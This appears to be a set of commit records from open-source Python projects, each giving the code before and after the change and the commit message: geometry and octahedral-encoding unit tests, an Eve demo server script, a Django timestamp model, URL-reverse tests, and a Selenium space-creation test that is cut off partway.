self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
def testOctDecodeErrors(self):
with self.assertRaises(ValueError):
octDecode(-1, 0)
with self.assertRaises(ValueError):
octDecode(0, -1)
with self.assertRaises(ValueError):
octDecode(256, 0)
with self.assertRaises(ValueError):
octDecode(0, 256)
def testOctEncode(self):
vec2 = octEncode([0.0, 0.0, -1.0])
self.assertEqual(vec2[0], 255)
self.assertEqual(vec2[1], 255)
vec2 = octEncode([0.0, 0.0, 1.0])
self.assertEqual(vec2[0], 128)
self.assertEqual(vec2[1], 128)
def testOctEncodeErrors(self):
with self.assertRaises(ValueError):
octEncode([2.0, 0.0, 0.0])
with self.assertRaises(ValueError):
octEncode([0.0, 0.0, 0.0])
|
Add tests for oct enc/dec
|
Add tests for oct enc/dec
|
Python
|
mit
|
loicgasser/quantized-mesh-tile
|
Add tests for oct enc/dec
|
# -*- coding: utf-8 -*-
import unittest
from quantized_mesh_tile.utils import octDecode, octEncode
class TestUtils(unittest.TestCase):
def testOctDecode(self):
vec3 = octDecode(0, 0)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(255, 255)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(255, 0)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(0, 255)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
def testOctDecodeErrors(self):
with self.assertRaises(ValueError):
octDecode(-1, 0)
with self.assertRaises(ValueError):
octDecode(0, -1)
with self.assertRaises(ValueError):
octDecode(256, 0)
with self.assertRaises(ValueError):
octDecode(0, 256)
def testOctEncode(self):
vec2 = octEncode([0.0, 0.0, -1.0])
self.assertEqual(vec2[0], 255)
self.assertEqual(vec2[1], 255)
vec2 = octEncode([0.0, 0.0, 1.0])
self.assertEqual(vec2[0], 128)
self.assertEqual(vec2[1], 128)
def testOctEncodeErrors(self):
with self.assertRaises(ValueError):
octEncode([2.0, 0.0, 0.0])
with self.assertRaises(ValueError):
octEncode([0.0, 0.0, 0.0])
|
<commit_before><commit_msg>Add tests for oct enc/dec<commit_after>
|
# -*- coding: utf-8 -*-
import unittest
from quantized_mesh_tile.utils import octDecode, octEncode
class TestUtils(unittest.TestCase):
def testOctDecode(self):
vec3 = octDecode(0, 0)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(255, 255)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(255, 0)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(0, 255)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
def testOctDecodeErrors(self):
with self.assertRaises(ValueError):
octDecode(-1, 0)
with self.assertRaises(ValueError):
octDecode(0, -1)
with self.assertRaises(ValueError):
octDecode(256, 0)
with self.assertRaises(ValueError):
octDecode(0, 256)
def testOctEncode(self):
vec2 = octEncode([0.0, 0.0, -1.0])
self.assertEqual(vec2[0], 255)
self.assertEqual(vec2[1], 255)
vec2 = octEncode([0.0, 0.0, 1.0])
self.assertEqual(vec2[0], 128)
self.assertEqual(vec2[1], 128)
def testOctEncodeErrors(self):
with self.assertRaises(ValueError):
octEncode([2.0, 0.0, 0.0])
with self.assertRaises(ValueError):
octEncode([0.0, 0.0, 0.0])
|
Add tests for oct enc/dec# -*- coding: utf-8 -*-
import unittest
from quantized_mesh_tile.utils import octDecode, octEncode
class TestUtils(unittest.TestCase):
def testOctDecode(self):
vec3 = octDecode(0, 0)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(255, 255)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(255, 0)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(0, 255)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
def testOctDecodeErrors(self):
with self.assertRaises(ValueError):
octDecode(-1, 0)
with self.assertRaises(ValueError):
octDecode(0, -1)
with self.assertRaises(ValueError):
octDecode(256, 0)
with self.assertRaises(ValueError):
octDecode(0, 256)
def testOctEncode(self):
vec2 = octEncode([0.0, 0.0, -1.0])
self.assertEqual(vec2[0], 255)
self.assertEqual(vec2[1], 255)
vec2 = octEncode([0.0, 0.0, 1.0])
self.assertEqual(vec2[0], 128)
self.assertEqual(vec2[1], 128)
def testOctEncodeErrors(self):
with self.assertRaises(ValueError):
octEncode([2.0, 0.0, 0.0])
with self.assertRaises(ValueError):
octEncode([0.0, 0.0, 0.0])
|
<commit_before><commit_msg>Add tests for oct enc/dec<commit_after># -*- coding: utf-8 -*-
import unittest
from quantized_mesh_tile.utils import octDecode, octEncode
class TestUtils(unittest.TestCase):
def testOctDecode(self):
vec3 = octDecode(0, 0)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(255, 255)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(255, 0)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(0, 255)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
def testOctDecodeErrors(self):
with self.assertRaises(ValueError):
octDecode(-1, 0)
with self.assertRaises(ValueError):
octDecode(0, -1)
with self.assertRaises(ValueError):
octDecode(256, 0)
with self.assertRaises(ValueError):
octDecode(0, 256)
def testOctEncode(self):
vec2 = octEncode([0.0, 0.0, -1.0])
self.assertEqual(vec2[0], 255)
self.assertEqual(vec2[1], 255)
vec2 = octEncode([0.0, 0.0, 1.0])
self.assertEqual(vec2[0], 128)
self.assertEqual(vec2[1], 128)
def testOctEncodeErrors(self):
with self.assertRaises(ValueError):
octEncode([2.0, 0.0, 0.0])
with self.assertRaises(ValueError):
octEncode([0.0, 0.0, 0.0])
|
|
49d847cfc6381dc6df41447eba650a5bf265a163
|
tests/test_geometry.py
|
tests/test_geometry.py
|
from gaphas.geometry import (
distance_rectangle_point,
intersect_line_line,
point_on_rectangle,
)
def test_distance_rectangle_point():
assert distance_rectangle_point((2, 0, 2, 2), (0, 0)) == 2
def test_distance_point_in_rectangle():
assert distance_rectangle_point((0, 0, 2, 2), (1, 1)) == 0
def test_point_on_rectangle():
assert point_on_rectangle((2, 2, 2, 2), (0, 0)) == (2, 2)
assert point_on_rectangle((2, 2, 2, 2), (3, 0)) == (3, 2)
def test_intersect_line_line():
assert intersect_line_line((3, 0), (8, 10), (0, 0), (10, 10)) == (6, 6)
assert intersect_line_line((0, 0), (10, 10), (3, 0), (8, 10)) == (6, 6)
assert intersect_line_line((0, 0), (10, 10), (8, 10), (3, 0)) == (6, 6)
assert intersect_line_line((8, 10), (3, 0), (0, 0), (10, 10)) == (6, 6)
def test_intersect_line_line_not_crossing():
assert intersect_line_line((0, 0), (0, 10), (3, 0), (8, 10)) is None
assert intersect_line_line((0, 0), (0, 10), (3, 0), (3, 10)) is None
|
Add tests for geometry module
|
Add tests for geometry module
|
Python
|
lgpl-2.1
|
amolenaar/gaphas
|
Add tests for geometry module
|
from gaphas.geometry import (
distance_rectangle_point,
intersect_line_line,
point_on_rectangle,
)
def test_distance_rectangle_point():
assert distance_rectangle_point((2, 0, 2, 2), (0, 0)) == 2
def test_distance_point_in_rectangle():
assert distance_rectangle_point((0, 0, 2, 2), (1, 1)) == 0
def test_point_on_rectangle():
assert point_on_rectangle((2, 2, 2, 2), (0, 0)) == (2, 2)
assert point_on_rectangle((2, 2, 2, 2), (3, 0)) == (3, 2)
def test_intersect_line_line():
assert intersect_line_line((3, 0), (8, 10), (0, 0), (10, 10)) == (6, 6)
assert intersect_line_line((0, 0), (10, 10), (3, 0), (8, 10)) == (6, 6)
assert intersect_line_line((0, 0), (10, 10), (8, 10), (3, 0)) == (6, 6)
assert intersect_line_line((8, 10), (3, 0), (0, 0), (10, 10)) == (6, 6)
def test_intersect_line_line_not_crossing():
assert intersect_line_line((0, 0), (0, 10), (3, 0), (8, 10)) is None
assert intersect_line_line((0, 0), (0, 10), (3, 0), (3, 10)) is None
|
<commit_before><commit_msg>Add tests for geometry module<commit_after>
|
from gaphas.geometry import (
distance_rectangle_point,
intersect_line_line,
point_on_rectangle,
)
def test_distance_rectangle_point():
assert distance_rectangle_point((2, 0, 2, 2), (0, 0)) == 2
def test_distance_point_in_rectangle():
assert distance_rectangle_point((0, 0, 2, 2), (1, 1)) == 0
def test_point_on_rectangle():
assert point_on_rectangle((2, 2, 2, 2), (0, 0)) == (2, 2)
assert point_on_rectangle((2, 2, 2, 2), (3, 0)) == (3, 2)
def test_intersect_line_line():
assert intersect_line_line((3, 0), (8, 10), (0, 0), (10, 10)) == (6, 6)
assert intersect_line_line((0, 0), (10, 10), (3, 0), (8, 10)) == (6, 6)
assert intersect_line_line((0, 0), (10, 10), (8, 10), (3, 0)) == (6, 6)
assert intersect_line_line((8, 10), (3, 0), (0, 0), (10, 10)) == (6, 6)
def test_intersect_line_line_not_crossing():
assert intersect_line_line((0, 0), (0, 10), (3, 0), (8, 10)) is None
assert intersect_line_line((0, 0), (0, 10), (3, 0), (3, 10)) is None
|
Add tests for geometry modulefrom gaphas.geometry import (
distance_rectangle_point,
intersect_line_line,
point_on_rectangle,
)
def test_distance_rectangle_point():
assert distance_rectangle_point((2, 0, 2, 2), (0, 0)) == 2
def test_distance_point_in_rectangle():
assert distance_rectangle_point((0, 0, 2, 2), (1, 1)) == 0
def test_point_on_rectangle():
assert point_on_rectangle((2, 2, 2, 2), (0, 0)) == (2, 2)
assert point_on_rectangle((2, 2, 2, 2), (3, 0)) == (3, 2)
def test_intersect_line_line():
assert intersect_line_line((3, 0), (8, 10), (0, 0), (10, 10)) == (6, 6)
assert intersect_line_line((0, 0), (10, 10), (3, 0), (8, 10)) == (6, 6)
assert intersect_line_line((0, 0), (10, 10), (8, 10), (3, 0)) == (6, 6)
assert intersect_line_line((8, 10), (3, 0), (0, 0), (10, 10)) == (6, 6)
def test_intersect_line_line_not_crossing():
assert intersect_line_line((0, 0), (0, 10), (3, 0), (8, 10)) is None
assert intersect_line_line((0, 0), (0, 10), (3, 0), (3, 10)) is None
|
<commit_before><commit_msg>Add tests for geometry module<commit_after>from gaphas.geometry import (
distance_rectangle_point,
intersect_line_line,
point_on_rectangle,
)
def test_distance_rectangle_point():
assert distance_rectangle_point((2, 0, 2, 2), (0, 0)) == 2
def test_distance_point_in_rectangle():
assert distance_rectangle_point((0, 0, 2, 2), (1, 1)) == 0
def test_point_on_rectangle():
assert point_on_rectangle((2, 2, 2, 2), (0, 0)) == (2, 2)
assert point_on_rectangle((2, 2, 2, 2), (3, 0)) == (3, 2)
def test_intersect_line_line():
assert intersect_line_line((3, 0), (8, 10), (0, 0), (10, 10)) == (6, 6)
assert intersect_line_line((0, 0), (10, 10), (3, 0), (8, 10)) == (6, 6)
assert intersect_line_line((0, 0), (10, 10), (8, 10), (3, 0)) == (6, 6)
assert intersect_line_line((8, 10), (3, 0), (0, 0), (10, 10)) == (6, 6)
def test_intersect_line_line_not_crossing():
assert intersect_line_line((0, 0), (0, 10), (3, 0), (8, 10)) is None
assert intersect_line_line((0, 0), (0, 10), (3, 0), (3, 10)) is None
|
|
8ccdd028347a73fc4706b0d34c4ee90eb9777336
|
run.py
|
run.py
|
# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
A demostration of a simple API powered by Eve REST API.
The live demo is available at eve-demo.herokuapp.com. Please keep in mind
that the it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2013 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
import os
from eve import Eve
if __name__ == '__main__':
# Heroku support: bind to PORT if defined, otherwise default to 5000.
if 'PORT' in os.environ:
port = int(os.environ.get('PORT'))
host = '0.0.0.0'
else:
port = 5000
host = '127.0.0.1'
app = Eve()
app.run(host=host, port=port)
|
# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
A demostration of a simple API powered by Eve REST API.
The live demo is available at eve-demo.herokuapp.com. Please keep in mind
that the it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2013 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
import os
from eve import Eve
if __name__ == '__main__':
# Heroku support: bind to PORT if defined, otherwise default to 5000.
if 'PORT' in os.environ:
port = int(os.environ.get('PORT'))
# use '0.0.0.0' to ensure your REST API is reachable from all your
# network (and not only your computer).
host = '0.0.0.0'
else:
port = 5000
host = '127.0.0.1'
app = Eve()
app.run(host=host, port=port)
|
Use '0.0.0.0' to ensure your API is reachable outside localhost.
|
Use '0.0.0.0' to ensure your API is reachable outside localhost.
|
Python
|
bsd-3-clause
|
nicolaiarocci/eve-demo,kidaa/eve-demo
|
# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
A demostration of a simple API powered by Eve REST API.
The live demo is available at eve-demo.herokuapp.com. Please keep in mind
that the it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2013 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
import os
from eve import Eve
if __name__ == '__main__':
# Heroku support: bind to PORT if defined, otherwise default to 5000.
if 'PORT' in os.environ:
port = int(os.environ.get('PORT'))
host = '0.0.0.0'
else:
port = 5000
host = '127.0.0.1'
app = Eve()
app.run(host=host, port=port)
Use '0.0.0.0' to ensure your API is reachable outside localhost.
|
# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
A demostration of a simple API powered by Eve REST API.
The live demo is available at eve-demo.herokuapp.com. Please keep in mind
that the it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2013 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
import os
from eve import Eve
if __name__ == '__main__':
# Heroku support: bind to PORT if defined, otherwise default to 5000.
if 'PORT' in os.environ:
port = int(os.environ.get('PORT'))
# use '0.0.0.0' to ensure your REST API is reachable from all your
# network (and not only your computer).
host = '0.0.0.0'
else:
port = 5000
host = '127.0.0.1'
app = Eve()
app.run(host=host, port=port)
|
<commit_before># -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
A demostration of a simple API powered by Eve REST API.
The live demo is available at eve-demo.herokuapp.com. Please keep in mind
that the it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2013 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
import os
from eve import Eve
if __name__ == '__main__':
# Heroku support: bind to PORT if defined, otherwise default to 5000.
if 'PORT' in os.environ:
port = int(os.environ.get('PORT'))
host = '0.0.0.0'
else:
port = 5000
host = '127.0.0.1'
app = Eve()
app.run(host=host, port=port)
<commit_msg>Use '0.0.0.0' to ensure your API is reachable outside localhost.<commit_after>
|
# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
A demostration of a simple API powered by Eve REST API.
The live demo is available at eve-demo.herokuapp.com. Please keep in mind
that the it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2013 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
import os
from eve import Eve
if __name__ == '__main__':
# Heroku support: bind to PORT if defined, otherwise default to 5000.
if 'PORT' in os.environ:
port = int(os.environ.get('PORT'))
# use '0.0.0.0' to ensure your REST API is reachable from all your
# network (and not only your computer).
host = '0.0.0.0'
else:
port = 5000
host = '127.0.0.1'
app = Eve()
app.run(host=host, port=port)
|
# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
A demostration of a simple API powered by Eve REST API.
The live demo is available at eve-demo.herokuapp.com. Please keep in mind
that the it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2013 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
import os
from eve import Eve
if __name__ == '__main__':
# Heroku support: bind to PORT if defined, otherwise default to 5000.
if 'PORT' in os.environ:
port = int(os.environ.get('PORT'))
host = '0.0.0.0'
else:
port = 5000
host = '127.0.0.1'
app = Eve()
app.run(host=host, port=port)
Use '0.0.0.0' to ensure your API is reachable outside localhost.# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
A demostration of a simple API powered by Eve REST API.
The live demo is available at eve-demo.herokuapp.com. Please keep in mind
that the it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2013 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
import os
from eve import Eve
if __name__ == '__main__':
# Heroku support: bind to PORT if defined, otherwise default to 5000.
if 'PORT' in os.environ:
port = int(os.environ.get('PORT'))
# use '0.0.0.0' to ensure your REST API is reachable from all your
# network (and not only your computer).
host = '0.0.0.0'
else:
port = 5000
host = '127.0.0.1'
app = Eve()
app.run(host=host, port=port)
|
<commit_before># -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
A demostration of a simple API powered by Eve REST API.
The live demo is available at eve-demo.herokuapp.com. Please keep in mind
that the it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2013 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
import os
from eve import Eve
if __name__ == '__main__':
# Heroku support: bind to PORT if defined, otherwise default to 5000.
if 'PORT' in os.environ:
port = int(os.environ.get('PORT'))
host = '0.0.0.0'
else:
port = 5000
host = '127.0.0.1'
app = Eve()
app.run(host=host, port=port)
<commit_msg>Use '0.0.0.0' to ensure your API is reachable outside localhost.<commit_after># -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
A demostration of a simple API powered by Eve REST API.
The live demo is available at eve-demo.herokuapp.com. Please keep in mind
that the it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2013 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
import os
from eve import Eve
if __name__ == '__main__':
# Heroku support: bind to PORT if defined, otherwise default to 5000.
if 'PORT' in os.environ:
port = int(os.environ.get('PORT'))
# use '0.0.0.0' to ensure your REST API is reachable from all your
# network (and not only your computer).
host = '0.0.0.0'
else:
port = 5000
host = '127.0.0.1'
app = Eve()
app.run(host=host, port=port)
|
e1634155d24be11d9f6648dd8983d76d4da78419
|
base/model_utils.py
|
base/model_utils.py
|
from django.db import models
class TimeStampedModel(models.Model):
"""
An abstract base class model that provides self-updating
``created`` and ``modified`` fields
"""
created = models.DateTimeField(auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
class Meta:
abstract = True
|
Move 'TimeStampedModel' to 'base' so it can be used in other apps
|
Move 'TimeStampedModel' to 'base' so it can be used in other apps
|
Python
|
apache-2.0
|
pkimber/base,pkimber/base,pkimber/base,pkimber/base
|
Move 'TimeStampedModel' to 'base' so it can be used in other apps
|
from django.db import models
class TimeStampedModel(models.Model):
"""
An abstract base class model that provides self-updating
``created`` and ``modified`` fields
"""
created = models.DateTimeField(auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
class Meta:
abstract = True
|
<commit_before><commit_msg>Move 'TimeStampedModel' to 'base' so it can be used in other apps<commit_after>
|
from django.db import models
class TimeStampedModel(models.Model):
"""
An abstract base class model that provides self-updating
``created`` and ``modified`` fields
"""
created = models.DateTimeField(auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
class Meta:
abstract = True
|
Move 'TimeStampedModel' to 'base' so it can be used in other appsfrom django.db import models
class TimeStampedModel(models.Model):
"""
An abstract base class model that provides self-updating
``created`` and ``modified`` fields
"""
created = models.DateTimeField(auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
class Meta:
abstract = True
|
<commit_before><commit_msg>Move 'TimeStampedModel' to 'base' so it can be used in other apps<commit_after>from django.db import models
class TimeStampedModel(models.Model):
"""
An abstract base class model that provides self-updating
``created`` and ``modified`` fields
"""
created = models.DateTimeField(auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
class Meta:
abstract = True
|
|
ae70dff0fddd580c82f744b0a450e489092014ac
|
fjord/base/tests/test_urlresolvers.py
|
fjord/base/tests/test_urlresolvers.py
|
from nose.tools import eq_
from fjord.base.tests import TestCase
from fjord.base.urlresolvers import reverse
class TestReverse(TestCase):
def test_no_locale(self):
# Note: This depends on the 'about' view. If we change that,
# then it breaks this test. But it seems silly to do a bunch
# of work to set up a better less fragile test plus it's
# unlikely we'll change the 'about' view.
eq_(reverse('about-view'), '/en-US/about')
def test_locale(self):
# Note: This depends on the 'about' view and the 'es'
# locale. If we change those, then it breaks this test.
eq_(reverse('about-view', locale='es'), '/es/about')
|
Add tests for new reverse
|
Add tests for new reverse
This adds the tests that should have gone with commit 16250bf.
|
Python
|
bsd-3-clause
|
rlr/fjord,mozilla/fjord,hoosteeno/fjord,mozilla/fjord,mozilla/fjord,DESHRAJ/fjord,staranjeet/fjord,Ritsyy/fjord,rlr/fjord,staranjeet/fjord,lgp171188/fjord,Ritsyy/fjord,Ritsyy/fjord,Ritsyy/fjord,staranjeet/fjord,lgp171188/fjord,rlr/fjord,hoosteeno/fjord,staranjeet/fjord,mozilla/fjord,hoosteeno/fjord,rlr/fjord,lgp171188/fjord,DESHRAJ/fjord,lgp171188/fjord,hoosteeno/fjord,DESHRAJ/fjord
|
Add tests for new reverse
This adds the tests that should have gone with commit 16250bf.
|
from nose.tools import eq_
from fjord.base.tests import TestCase
from fjord.base.urlresolvers import reverse
class TestReverse(TestCase):
def test_no_locale(self):
# Note: This depends on the 'about' view. If we change that,
# then it breaks this test. But it seems silly to do a bunch
# of work to set up a better less fragile test plus it's
# unlikely we'll change the 'about' view.
eq_(reverse('about-view'), '/en-US/about')
def test_locale(self):
# Note: This depends on the 'about' view and the 'es'
# locale. If we change those, then it breaks this test.
eq_(reverse('about-view', locale='es'), '/es/about')
|
<commit_before><commit_msg>Add tests for new reverse
This adds the tests that should have gone with commit 16250bf.<commit_after>
|
from nose.tools import eq_
from fjord.base.tests import TestCase
from fjord.base.urlresolvers import reverse
class TestReverse(TestCase):
def test_no_locale(self):
# Note: This depends on the 'about' view. If we change that,
# then it breaks this test. But it seems silly to do a bunch
# of work to set up a better less fragile test plus it's
# unlikely we'll change the 'about' view.
eq_(reverse('about-view'), '/en-US/about')
def test_locale(self):
# Note: This depends on the 'about' view and the 'es'
# locale. If we change those, then it breaks this test.
eq_(reverse('about-view', locale='es'), '/es/about')
|
Add tests for new reverse
This adds the tests that should have gone with commit 16250bf.from nose.tools import eq_
from fjord.base.tests import TestCase
from fjord.base.urlresolvers import reverse
class TestReverse(TestCase):
def test_no_locale(self):
# Note: This depends on the 'about' view. If we change that,
# then it breaks this test. But it seems silly to do a bunch
# of work to set up a better less fragile test plus it's
# unlikely we'll change the 'about' view.
eq_(reverse('about-view'), '/en-US/about')
def test_locale(self):
# Note: This depends on the 'about' view and the 'es'
# locale. If we change those, then it breaks this test.
eq_(reverse('about-view', locale='es'), '/es/about')
|
<commit_before><commit_msg>Add tests for new reverse
This adds the tests that should have gone with commit 16250bf.<commit_after>from nose.tools import eq_
from fjord.base.tests import TestCase
from fjord.base.urlresolvers import reverse
class TestReverse(TestCase):
def test_no_locale(self):
# Note: This depends on the 'about' view. If we change that,
# then it breaks this test. But it seems silly to do a bunch
# of work to set up a better less fragile test plus it's
# unlikely we'll change the 'about' view.
eq_(reverse('about-view'), '/en-US/about')
def test_locale(self):
# Note: This depends on the 'about' view and the 'es'
# locale. If we change those, then it breaks this test.
eq_(reverse('about-view', locale='es'), '/es/about')
|
|
bdc3fab8c4da9bd64de46cedc600fcf1c771aada
|
tests/functional/test_create_space.py
|
tests/functional/test_create_space.py
|
#/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2010-2012 Cidadania S. Coop. Galega
#
# This file is part of e-cidadania.
#
# e-cidadania is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# e-cidadania is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with e-cidadania. If not, see <http://www.gnu.org/licenses/>.
import os
from selenium.webdriver.common.keys import Keys
from tests.functional_utils import FunctionalTestCase
class CreateSpaceTest(FunctionalTestCase):
"""Tests if the page to create a space works correctly.
"""
def setUp(self):
self.init()
def testCreateSpace(self):
username = 'test_user'
password = 'test_password'
self.create_super_user(username, password)
url = self.live_server_url + self.getURL('site-index')
self.browser.get(url)
self.wait(2)
self.browser.find_element_by_link_text("Login").click()
self.wait(2)
username_field = self.browser.find_element_by_name('username')
username_field.send_keys(username)
password_field = self.browser.find_element_by_name('password')
password_field.send_keys(password)
self.wait(2)
password_field.send_keys(Keys.RETURN)
#self.wait(1)
self.wait(2)
url = self.live_server_url + self.getURL('create-space')
self.browser.get(url)
self.wait(2)
#Now we fill the creat space form
name_field = self.browser.find_element_by_name('name')
name_field.send_keys('test_space')
url_field = self.browser.find_element_by_name('url')
url_field.send_keys('test_url')
logo_field = self.browser.find_element_by_name('logo')
logo_field.send_keys(os.getcwd()+'/generic.jpeg')
banner_field = self.browser.find_element_by_name('banner')
banner_field.send_keys(os.getcwd()+'/generic.jpeg')
self.wait(2)
#url_field.send_keys(Keys.RETURN)
banner_field.submit()
self.wait(300)
|
Add functional tests for create a space.
|
Add functional tests for create a space.
|
Python
|
apache-2.0
|
cidadania/e-cidadania,cidadania/e-cidadania
|
Add functional tests for create a space.
|
#/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2010-2012 Cidadania S. Coop. Galega
#
# This file is part of e-cidadania.
#
# e-cidadania is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# e-cidadania is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with e-cidadania. If not, see <http://www.gnu.org/licenses/>.
import os
from selenium.webdriver.common.keys import Keys
from tests.functional_utils import FunctionalTestCase
class CreateSpaceTest(FunctionalTestCase):
"""Tests if the page to create a space works correctly.
"""
def setUp(self):
self.init()
def testCreateSpace(self):
username = 'test_user'
password = 'test_password'
self.create_super_user(username, password)
url = self.live_server_url + self.getURL('site-index')
self.browser.get(url)
self.wait(2)
self.browser.find_element_by_link_text("Login").click()
self.wait(2)
username_field = self.browser.find_element_by_name('username')
username_field.send_keys(username)
password_field = self.browser.find_element_by_name('password')
password_field.send_keys(password)
self.wait(2)
password_field.send_keys(Keys.RETURN)
#self.wait(1)
self.wait(2)
url = self.live_server_url + self.getURL('create-space')
self.browser.get(url)
self.wait(2)
#Now we fill the creat space form
name_field = self.browser.find_element_by_name('name')
name_field.send_keys('test_space')
url_field = self.browser.find_element_by_name('url')
url_field.send_keys('test_url')
logo_field = self.browser.find_element_by_name('logo')
logo_field.send_keys(os.getcwd()+'/generic.jpeg')
banner_field = self.browser.find_element_by_name('banner')
banner_field.send_keys(os.getcwd()+'/generic.jpeg')
self.wait(2)
#url_field.send_keys(Keys.RETURN)
banner_field.submit()
self.wait(300)
|
<commit_before><commit_msg>Add functional tests for create a space.<commit_after>
|
#/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2010-2012 Cidadania S. Coop. Galega
#
# This file is part of e-cidadania.
#
# e-cidadania is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# e-cidadania is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with e-cidadania. If not, see <http://www.gnu.org/licenses/>.
import os
from selenium.webdriver.common.keys import Keys
from tests.functional_utils import FunctionalTestCase
class CreateSpaceTest(FunctionalTestCase):
"""Tests if the page to create a space works correctly.
"""
def setUp(self):
self.init()
def testCreateSpace(self):
username = 'test_user'
password = 'test_password'
self.create_super_user(username, password)
url = self.live_server_url + self.getURL('site-index')
self.browser.get(url)
self.wait(2)
self.browser.find_element_by_link_text("Login").click()
self.wait(2)
username_field = self.browser.find_element_by_name('username')
